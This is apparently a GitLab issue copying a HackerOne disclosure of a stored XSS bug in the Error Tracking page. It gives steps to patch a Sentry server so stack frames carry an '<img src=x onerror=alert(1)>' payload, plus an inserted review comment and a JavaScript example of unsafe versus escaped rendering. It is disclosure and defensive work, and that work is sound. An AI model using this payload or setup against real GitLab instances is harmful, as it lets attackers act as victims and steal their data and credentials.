
Stored XSS on the Error Tracking page

HackerOne report #859888 by mike12 on 2020-04-26, assigned to @jeremymatos:

Hello Gitlab!

Steps to reproduce

  1. Set up a Sentry server (or just use this one: http://REDACTED).
    1. Install Sentry Server, use this doc

    2. Connect to the Sentry container: docker exec -it sentry_onpremise_web_1 /bin/bash

    3. Install Vim: apt update && apt install vim -y

    4. Open stacktrace.py file: vim /usr/local/lib/python2.7/site-packages/sentry/interfaces/stacktrace.py

    5. On line 210 (inside get_api_context), replace the line "colNo": self.colno, with "colNo": "<img src=x onerror=alert(1)>", so that every frame the Sentry API returns carries the payload:

      def get_api_context(self, is_public=False, pad_addr=None, platform=None):  
          from sentry.stacktraces.functions import get_function_name_for_frame  
      
          function = get_function_name_for_frame(self, platform)  
          data = {  
              "filename": self.filename,  
              "absPath": self.abs_path,  
              "module": self.module,  
              "package": self.package,  
              "platform": self.platform,  
              "instructionAddr": pad_hex_addr(self.instruction_addr, pad_addr),  
              "symbolAddr": pad_hex_addr(self.symbol_addr, pad_addr),  
              "function": function,  
              "rawFunction": self.raw_function,  
              "symbol": self.symbol,  
              "context": get_context(  
                  lineno=self.lineno,  
                  context_line=self.context_line,  
                  pre_context=self.pre_context,  
                  post_context=self.post_context,  
              ),  
              "lineNo": self.lineno,  
      -       "colNo": self.colno,  
      +       "colNo": "<img src=x onerror=alert(1)>",  
              "inApp": self.in_app,  
              "trust": self.trust,  
              "errors": self.errors,  
          }  
          if not is_public:  
              data["vars"] = self.vars  
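Review bot: the hunk has no @@ header or file path, so the "line 210" stated in step 5 cannot be checked against the excerpt; carry the path from step 4 (/usr/local/lib/python2.7/site-packages/sentry/interfaces/stacktrace.py) and the hunk header along with the context lines. The replaced line also turns colNo from an integer (self.colno) into a string for every frame that get_api_context serialises, unconditionally, which is what puts the payload into the JSON that GitLab fetches; the other string-valued keys in data (filename, absPath, function, ...) are left untouched here, so if the report is meant to show which fields GitLab renders unescaped, state that only colNo was exercised.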
    6. Exit from the container

    7. Restart the container: docker restart sentry_onpremise_web_1

    8. Create a new Sentry project, use this doc

    9. Capture an error using Sentry SDK. Use docs: Initialize Sentry SDK and Capture your First Error

    10. Generate a Sentry auth token, use this doc

  2. Run Gitlab: docker run --detach --hostname gitlab.example.com --publish 443:443 --publish 80:80 --publish 22:22 --name gitlab gitlab/gitlab-ce:latest
  3. Create a new Gitlab project
  4. Go to Settings->Operations->Error Tracking and connect Sentry to the Gitlab project
    1. Check the "Active" checkbox
    2. Sentry API URL: http://REDACTED:9000 (or your Sentry server URL)
    3. Auth Token: REDACTED2 (or your Sentry auth token)
    4. Project: Sentry | javascript (or your Sentry project)
  5. Go to Operations->Error Tracking and open details for an error.

Screenshots (attached): 1.png, 2.png
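The data path the steps above exercise, as an added example that is not part of the original report and is not GitLab's or Sentry's code: a frame object shaped like the data dict that Sentry's get_api_context builds (keys as in the stacktrace.py excerpt) comes back from the Sentry API and is rendered into the Error Tracking page. renderFrameUnsafe splices the fields straight into markup and reproduces the bug class; validateFrame and renderFrameSafe are the type check and the escaping a consumer of that API should apply. The sample frames and every function name are constructed for this example.

```javascript
// Added example (not GitLab's or Sentry's code). Models the data flow the
// report exercises: a frame object shaped like the "data" dict that Sentry's
// get_api_context builds (keys as in the stacktrace.py excerpt) comes back
// from the Sentry API and is rendered into the Error Tracking page.
// renderFrameUnsafe splices the fields into markup and reproduces the bug;
// validateFrame and renderFrameSafe are the checks a consumer should apply.
// sampleFrames and all function names are constructed for this example.

// Field typing taken from the get_api_context excerpt: lineno/colno are
// integers, the remaining keys are strings supplied by whatever SDK sent
// the event to Sentry, so none of them may be trusted as markup.
const INTEGER_FIELDS = ["lineNo", "colNo"];
const STRING_FIELDS = ["filename", "absPath", "module", "package", "platform",
  "function", "rawFunction", "symbol"];

// Constructed sample response: frame 0 carries the report's payload in colNo,
// frame 1 carries markup in filename to show the string fields need the
// same treatment.
const sampleFrames = [
  {
    filename: "app.js",
    absPath: "http://example.test/static/app.js",
    function: "handleClick",
    lineNo: 42,
    colNo: "<img src=x onerror=alert(1)>",
    inApp: true,
  },
  {
    filename: "<b>vendor</b>.js",
    absPath: "http://example.test/static/vendor.js",
    function: "dispatch",
    lineNo: 7,
    colNo: 13,
    inApp: false,
  },
];

// Vulnerable renderer: whatever the API returned lands in the DOM as HTML.
function renderFrameUnsafe(frame) {
  return `<div class="frame">${frame.filename} in ${frame.function}` +
    ` at line ${frame.lineNo}:${frame.colNo}</div>`;
}

// Escape for element content (and attribute values in double quotes).
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Report every field whose type does not match the Sentry frame model, plus a
// heuristic flag for string fields that contain markup characters; the
// latter is a signal for review, not proof of an attack.
function validateFrame(frame) {
  const problems = [];
  for (const key of INTEGER_FIELDS) {
    const v = frame[key];
    if (v != null && !Number.isInteger(v)) {
      problems.push(`${key}: expected integer, got ${typeof v}`);
    }
  }
  for (const key of STRING_FIELDS) {
    const v = frame[key];
    if (v != null && typeof v !== "string") {
      problems.push(`${key}: expected string, got ${typeof v}`);
    } else if (typeof v === "string" && /[<>]/.test(v)) {
      problems.push(`${key}: contains markup characters`);
    }
  }
  return problems;
}

// Hardened renderer: integer fields are dropped unless they really are
// integers, and every string field is escaped before it reaches markup.
function renderFrameSafe(frame) {
  const lineNo = Number.isInteger(frame.lineNo) ? frame.lineNo : null;
  const colNo = Number.isInteger(frame.colNo) ? frame.colNo : null;
  let where = "";
  if (lineNo !== null) {
    where = colNo !== null ? ` at line ${lineNo}:${colNo}` : ` at line ${lineNo}`;
  }
  const name = escapeHtml(frame.filename || "");
  const fn = escapeHtml(frame.function || "");
  return `<div class="frame">${name} in ${fn}${where}</div>`;
}

for (const frame of sampleFrames) {
  console.log("problems:", validateFrame(frame));
  console.log("unsafe:  ", renderFrameUnsafe(frame));
  console.log("safe:    ", renderFrameSafe(frame));
}
```

In a Vue component (GitLab's Error Tracking UI is Vue), the unsafe renderer corresponds to building a string and binding it with v-html; ordinary {{ }} interpolation escapes the way renderFrameSafe does, and the integer check belongs in the client code that parses the Sentry response, so that a non-numeric colNo is rejected before any component sees it.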

My GitLab version

root@gitlab:/# gitlab-rake gitlab:env:info

System information  
System:		  
Current User:	git  
Using RVM:	no  
Ruby Version:	2.6.5p114  
Gem Version:	2.7.10  
Bundler Version:1.17.3  
Rake Version:	12.3.3  
Redis Version:	5.0.7  
Git Version:	2.26.2  
Sidekiq Version:5.2.7  
Go Version:	unknown

GitLab information  
Version:	12.10.1  
Revision:	e658772bd63  
Directory:	/opt/gitlab/embedded/service/gitlab-rails  
DB Adapter:	PostgreSQL  
DB Version:	11.7  
URL:		http://gitlab.example.com  
HTTP Clone URL:	http://gitlab.example.com/some-group/some-project.git  
SSH Clone URL:	git@gitlab.example.com:some-group/some-project.git  
Using LDAP:	no  
Using Omniauth:	yes  
Omniauth Providers: 

GitLab Shell  
Version:	12.2.0  
Repository storage paths:  
- default: 	/var/opt/gitlab/git-data/repositories  
GitLab Shell path:		/opt/gitlab/embedded/service/gitlab-shell  
Git:		/opt/gitlab/embedded/bin/git  

Impact

An attacker who controls the Sentry instance a GitLab project is connected to (or who can otherwise inject into its API responses, as the server-side edit above does) can, against any user who opens the error details page:

  1. Perform any action within GitLab that the victim user can perform
  2. Steal sensitive user data
  3. Steal the user's credentials

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

Edited by Jeremy Matos